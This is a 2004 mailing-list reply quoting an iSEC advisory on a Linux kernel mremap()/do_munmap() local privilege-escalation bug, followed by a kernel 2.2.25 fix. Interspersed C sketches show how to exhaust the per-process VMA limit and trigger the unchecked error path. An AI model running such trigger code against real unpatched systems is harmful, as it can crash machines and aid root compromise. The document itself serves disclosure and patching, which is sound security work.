
Re: Second critical mremap() bug found in all Linux kernels



On Wed, 18 Feb 2004, Paul Starzetz wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
> 
> Synopsis:  Linux kernel do_mremap VMA limit local privilege escalation
>            vulnerability
> Product:   Linux kernel
> Version:   2.2 up to 2.2.25, 2.4 up to 2.4.24, 2.6 up to 2.6.2
> Vendor:    http://www.kernel.org/
> URL:       http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt
> CVE:       CAN-2004-0077
> Author:    Paul Starzetz <ihaquer@xxxxxxx>
> Date:      February 18, 2004
> 
> 
> Issue:
> ======
> 
> A critical security vulnerability has been found in the Linux kernel
> memory management code, inside the mremap(2) system call, due to a
> missing function return value check. This bug is completely unrelated
> to the mremap bug disclosed on 05-01-2004, apart from affecting the
> same internal kernel function code.
> 
> 
> Details:
> ========
> 
> The Linux kernel manages the list of valid, user-addressable memory
> locations on a per-process basis. Every process owns a singly linked
> list of so-called virtual memory area descriptors (from now on just
> VMAs). Every VMA describes the start of a valid memory region, its
> length and various memory flags such as the page protection.
> 
> Every VMA in the list corresponds to a part of the process's page
> table. The page table contains descriptors (in short, page table
> entries or PTEs) of the physical memory pages seen by the process. A
> VMA descriptor can thus be understood as a high-level description of a
> particular region of the process's page table, storing PTE properties
> such as the page R/W flag.
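
For illustration, here is a trimmed-down sketch of such a descriptor,
roughly as it appears in 2.4-era include/linux/mm.h (most members are
omitted and the listing is paraphrased from memory, not a verbatim
excerpt):

struct vm_area_struct {
        struct mm_struct *vm_mm;        /* address space the area belongs to */
        unsigned long vm_start;         /* first address covered by the area */
        unsigned long vm_end;           /* first address beyond the area */
        struct vm_area_struct *vm_next; /* next VMA in the per-process list */
        pgprot_t vm_page_prot;          /* protection applied to the PTEs */
        unsigned long vm_flags;         /* VM_READ, VM_WRITE, VM_EXEC, ... */
        /* file backing, vm_ops and further members omitted */
};
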
> 
> The mremap() system call provides resizing (shrinking or growing) as
> well as moving of existing virtual memory areas, or any parts of them,
> across the process's addressable space.
> 
> Moving a part of the virtual memory from inside a VMA to a new
> location requires the creation of a new VMA descriptor as well as
> copying of the underlying page table entries described by the VMA from
> the old to the new location in the process's page table.
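
Seen from user space, the kind of move just described boils down to a
single mremap(2) call with MREMAP_FIXED on kernels that know that flag
(2.2 does not, as the Impact section below points out). A minimal sketch,
where the sizes, addresses and variable names are mine and chosen purely
for illustration:

#define _GNU_SOURCE
#include <sys/mman.h>
#include <stdio.h>

int main(void)
{
        size_t page = 4096;     /* assume 4 KB pages for simplicity */

        /* VMA1: a larger area into whose middle a page will be moved */
        char *vma1 = mmap(NULL, 16 * page, PROT_READ | PROT_WRITE,
                          MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        /* VMA2: the area the page is taken from */
        char *vma2 = mmap(NULL, 4 * page, PROT_READ | PROT_WRITE,
                          MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (vma1 == MAP_FAILED || vma2 == MAP_FAILED)
                return 1;

        /* move one page out of VMA2 into the middle of VMA1; the kernel
         * must unmap the overlapped part of VMA1 (splitting it in two)
         * and create a new VMA for the moved page */
        void *moved = mremap(vma2 + page, page, page,
                             MREMAP_MAYMOVE | MREMAP_FIXED, vma1 + 8 * page);
        if (moved == MAP_FAILED)
                perror("mremap");
        return 0;
}
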
> 
> To accomplish this task the do_mremap() code calls the internal kernel
> function do_munmap() to remove any mapping that may already exist at
> the new location, as well as to remove the old virtual memory mapping.
> Unfortunately the code does not test the return value of do_munmap(),
> which may fail if the maximum number of available VMA descriptors has
> been exceeded. This happens if one tries to unmap the middle part of
> an existing memory mapping while the process's limit on the number of
> VMAs has already been reached (which is currently 65535).
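
Hitting that limit requires no special privileges. A minimal sketch of a
process exhausting its own VMA descriptors (the mapping size below is only
chosen to exceed the limit; it is not a value taken from the advisory or
the exploit):

#define _GNU_SOURCE
#include <sys/mman.h>
#include <stdio.h>

int main(void)
{
        size_t page = 4096;             /* assume 4 KB pages for simplicity */
        size_t npages = 0x40000;        /* enough pages to exceed 65535 VMAs */
        size_t i;
        char *base = mmap(NULL, npages * page, PROT_READ | PROT_WRITE,
                          MAP_PRIVATE | MAP_ANONYMOUS | MAP_NORESERVE, -1, 0);

        if (base == MAP_FAILED)
                return 1;
        /* unmapping a page from the middle of an area splits one VMA into
         * two; once the per-process limit is reached, munmap() itself
         * starts failing with ENOMEM */
        for (i = 1; i < npages; i += 2)
                if (munmap(base + i * page, page) < 0) {
                        printf("VMA limit reached after %lu splits\n",
                               (unsigned long)(i / 2));
                        break;
                }
        return 0;
}
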
> 
> One of the possible situations can be illustrated with the following 
> picture. The corresponding page table entries (PTEs) have been marked 
> with o and x:
> 
> Before mremap():
> 
> (oooooooooooooooooooooooo)     (xxxxxxxxxxxx)
> [----------VMA1----------]     [----VMA2----]
>       [REMAPPED-VMA] <---------------|
> 
> 
> After mremap() without VMA limit:
> 
> (oooo)(xxxxxxxxxxxx)(oooo)
> [VMA3][REMAPPED-VMA][VMA4]
> 
> 
> After mremap() with the VMA limit reached:
> 
> (ooooxxxxxxxxxxxxxxoooo)
> [---------VMA1---------]
>      [REMAPPED-VMA]
> 
> 
> After the maximum number of VMAs in the process's VMA list has been
> reached, do_munmap() will refuse to create the necessary VMA hole,
> because doing so would split the original VMA into two disjoint VMAs
> and thereby exceed the VMA descriptor limit.
> 
> Due to the missing return value check after the attempt to unmap the
> middle of VMA1 (this is the first invocation of do_munmap() inside the
> do_mremap() code), the corresponding page table entries from VMA2 are
> still inserted into the page table location described by VMA1 and are
> thus subject to VMA1's page protection flags. It must also be
> mentioned that the original PTEs in VMA1 are lost, leaving the
> corresponding page frames unusable forever.
> 
> The kernel also tries to insert the overlapping VMA into the VMA
> descriptor list, but this fails due to further checks in the low-level
> VMA manipulation code. The low-level VMA list check in the 2.4 and 2.6
> kernel versions just calls BUG(), thereby terminating the malicious
> process.
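
Putting the two sketches above together gives a rough, untested
illustration of the sequence just described (it is not the announced
exploit). On a kernel that checks the return value the final mremap() is
simply expected to fail; on a vulnerable 2.4/2.6 kernel the advisory says
the process ends up being terminated by BUG():

#define _GNU_SOURCE
#include <sys/mman.h>
#include <stdio.h>

int main(void)
{
        size_t page = 4096;
        size_t npages = 0x40000;
        size_t i;

        /* VMA1: a large area; holes are punched into its first half only,
         * so that its second half stays one big VMA to aim the remap at */
        char *vma1 = mmap(NULL, npages * page, PROT_READ | PROT_WRITE,
                          MAP_PRIVATE | MAP_ANONYMOUS | MAP_NORESERVE, -1, 0);
        /* VMA2: the source of the page to be moved */
        char *vma2 = mmap(NULL, 4 * page, PROT_READ | PROT_WRITE,
                          MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (vma1 == MAP_FAILED || vma2 == MAP_FAILED)
                return 1;

        /* burn VMA descriptors until the per-process limit is reached */
        for (i = 1; i < npages / 2; i += 2)
                if (munmap(vma1 + i * page, page) < 0)
                        break;

        /* ask for a remap into the middle of the remaining big VMA; the
         * do_munmap() that should punch a hole there has to fail now,
         * which is exactly the unchecked error path described above */
        if (mremap(vma2, page, page, MREMAP_MAYMOVE | MREMAP_FIXED,
                   vma1 + (npages / 2 + npages / 4) * page) == MAP_FAILED)
                perror("mremap");
        return 0;
}
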
> 
> There are also two other unchecked calls to do_munmap() inside the
> do_mremap() code, and we believe that the second occurrence of the
> unchecked do_munmap() is also exploitable. The second occurrence takes
> place if the VMA to be remapped is being truncated in place. Note that
> do_munmap() can also fail under an exceptionally low memory condition
> while trying to allocate a VMA descriptor.
> 
> We were able to create robust proof-of-concept exploit code giving
> full super-user privileges on all vulnerable kernel versions. The
> exploit code will be released next week.
> 
> 
> Impact:
> =======
> 
> Since no special privileges are required to use the mremap(2) system
> call, any process may use its unexpected behavior to disrupt the
> kernel memory management subsystem.
> 
> Proper exploitation of this vulnerability leads to local privilege 
> escalation giving an attacker full super-user privileges. The 
> vulnerability may also lead to a denial-of-service attack on the 
> available system memory.
> 
> Tested and known to be vulnerable kernel versions are all <= 2.2.25,
> <= 2.4.24 and <= 2.6.1. The 2.2.25 version of the Linux kernel does
> not recognize the MREMAP_FIXED flag, but this does not prevent the bug
> from being successfully exploited. All users are encouraged to patch
> all vulnerable systems as soon as appropriate vendor patches are
> released. There is no hotfix for this vulnerability; even limited
> per-user virtual memory still permits do_munmap() to fail.
> 
> 
> Credits:
> ========
> 
> Paul Starzetz <ihaquer@xxxxxxx> has identified the vulnerability and 
> performed further research. COPYING, DISTRIBUTION, AND MODIFICATION OF 
> INFORMATION PRESENTED HERE IS ALLOWED ONLY WITH EXPRESS PERMISSION OF 
> ONE OF THE AUTHORS.
> 
> 
> Disclaimer:
> ===========
> 
> This document and all the information it contains are provided "as is", 
> for educational purposes only, without warranty of any kind, whether 
> express or implied.
> 
> The authors reserve the right not to be responsible for the topicality, 
> correctness, completeness or quality of the information provided in
> this document. Liability claims regarding damage caused by the use of 
> any information provided, including any kind of information which is 
> incomplete or incorrect, will therefore be rejected.
> 
> - -- 
> Paul Starzetz
> iSEC Security Research
> http://isec.pl/
> 
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.0.7 (GNU/Linux)
> 
> iD8DBQFAM1QzC+8U3Z5wpu4RAqXzAKCMOkFu1mXzzRgLyuFYp4ORpQCQDgCfe4M2
> 3IjbGvzniOjv/Hc7KKAzMtU=
> =GJds
> -----END PGP SIGNATURE-----
> 
> 
The attached patch fixes this bug for kernel 2.2.25. It should also apply
cleanly to kernels since at least 2.2.21.
-- 

    Sincerely Your, Dan.
--- linux/mm/mremap.c.security  Sun Mar 25 20:31:03 2001
+++ linux/mm/mremap.c   Thu Feb 19 05:10:34 2004
@@ -9,6 +9,7 @@
 #include <linux/shm.h>
 #include <linux/mman.h>
 #include <linux/swap.h>
+#include <linux/file.h>
 
 #include <asm/uaccess.h>
 #include <asm/pgtable.h>
@@ -25,7 +26,7 @@
        if (pgd_none(*pgd))
                goto end;
        if (pgd_bad(*pgd)) {
-               printk("move_one_page: bad source pgd (%08lx)\n", pgd_val(*pgd));
+               printk("copy_one_page: bad source pgd (%08lx)\n", pgd_val(*pgd));
                pgd_clear(pgd);
                goto end;
        }
@@ -34,7 +35,7 @@
        if (pmd_none(*pmd))
                goto end;
        if (pmd_bad(*pmd)) {
-               printk("move_one_page: bad source pmd (%08lx)\n", pmd_val(*pmd));
+               printk("copy_one_page: bad source pmd (%08lx)\n", pmd_val(*pmd));
                pmd_clear(pmd);
                goto end;
        }
@@ -57,34 +58,22 @@
        return pte;
 }
 
-static inline int copy_one_pte(pte_t * src, pte_t * dst)
+static int copy_one_page(struct mm_struct *mm, unsigned long old_addr, unsigned long new_addr)
 {
-       int error = 0;
-       pte_t pte = *src;
+       pte_t * src, * dst;
 
-       if (!pte_none(pte)) {
-               error++;
-               if (dst) {
-                       pte_clear(src);
-                       set_pte(dst, pte);
-                       error--;
+       src = get_one_pte(mm, old_addr);
+       if (src && !pte_none(*src)) {
+               if ((dst = alloc_one_pte(mm, new_addr))) {
+                       set_pte(dst, *src);
+                       return 0;
                }
+               return 1;
        }
-       return error;
-}
-
-static int move_one_page(struct mm_struct *mm, unsigned long old_addr, unsigned long new_addr)
-{
-       int error = 0;
-       pte_t * src;
-
-       src = get_one_pte(mm, old_addr);
-       if (src)
-               error = copy_one_pte(src, alloc_one_pte(mm, new_addr));
-       return error;
+       return 0;
 }
 
-static int move_page_tables(struct mm_struct * mm,
+static int copy_page_tables(struct mm_struct * mm,
        unsigned long new_addr, unsigned long old_addr, unsigned long len)
 {
        unsigned long offset = len;
@@ -99,7 +88,7 @@
         */
        while (offset) {
                offset -= PAGE_SIZE;
-               if (move_one_page(mm, old_addr + offset, new_addr + offset))
+               if (copy_one_page(mm, old_addr + offset, new_addr + offset))
                        goto oops_we_failed;
        }
        return 0;
@@ -113,8 +102,6 @@
         */
 oops_we_failed:
        flush_cache_range(mm, new_addr, new_addr + len);
-       while ((offset += PAGE_SIZE) < len)
-               move_one_page(mm, new_addr + offset, old_addr + offset);
        zap_page_range(mm, new_addr, len);
        flush_tlb_range(mm, new_addr, new_addr + len);
        return -1;
@@ -129,7 +116,9 @@
        if (new_vma) {
                unsigned long new_addr = get_unmapped_area(addr, new_len);
 
-               if (new_addr && !move_page_tables(current->mm, new_addr, addr, old_len)) {
+               if (new_addr && !copy_page_tables(current->mm, new_addr, addr, old_len)) {
+                       unsigned long ret;
+
                        *new_vma = *vma;
                        new_vma->vm_start = new_addr;
                        new_vma->vm_end = new_addr+new_len;
@@ -138,9 +127,19 @@
                                new_vma->vm_file->f_count++;
                        if (new_vma->vm_ops && new_vma->vm_ops->open)
                                new_vma->vm_ops->open(new_vma);
+                       if ((ret = do_munmap(addr, old_len))) {
+                               if (new_vma->vm_ops && new_vma->vm_ops->close)
+                                       new_vma->vm_ops->close(new_vma);
+                               if (new_vma->vm_file)
+                                       fput(new_vma->vm_file);
+                               flush_cache_range(current->mm, new_addr, new_addr + old_len);
+                               zap_page_range(current->mm, new_addr, old_len);
+                               flush_tlb_range(current->mm, new_addr, new_addr + old_len);
+                               kmem_cache_free(vm_area_cachep, new_vma);
+                               return ret;
+                       }
                        insert_vm_struct(current->mm, new_vma);
                        merge_segments(current->mm, new_vma->vm_start, new_vma->vm_end);
-                       do_munmap(addr, old_len);
                        current->mm->total_vm += new_len >> PAGE_SHIFT;
                        if (new_vma->vm_flags & VM_LOCKED) {
                                current->mm->locked_vm += new_len >> PAGE_SHIFT;
@@ -176,9 +175,9 @@
         * Always allow a shrinking remap: that just unmaps
         * the unnecessary pages..
         */
-       ret = addr;
        if (old_len >= new_len) {
-               do_munmap(addr+new_len, old_len - new_len);
+               if (!(ret = do_munmap(addr+new_len, old_len - new_len)))
+                       ret = addr;
                goto out;
        }